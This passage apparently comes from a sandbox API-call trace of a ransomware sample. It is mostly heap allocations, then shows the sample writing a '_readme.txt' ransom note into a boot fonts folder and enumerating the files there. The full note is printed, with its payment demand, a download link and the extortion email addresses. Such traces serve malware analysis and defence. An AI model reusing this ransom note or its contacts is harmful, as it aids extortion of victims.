lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.505] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0227.505] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.505] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.505] PathFindFileNameW (pszPath="") returned="" [0227.505] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.506] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.506] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.506] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.506] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0227.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.506] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0227.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.507] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.507] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.507] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.508] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.508] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.508] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.508] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.508] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.508] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.508] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.508] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0227.508] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0227.508] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0227.508] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0227.508] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0227.508] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0227.508] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.508] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.508] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.508] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.508] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.508] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 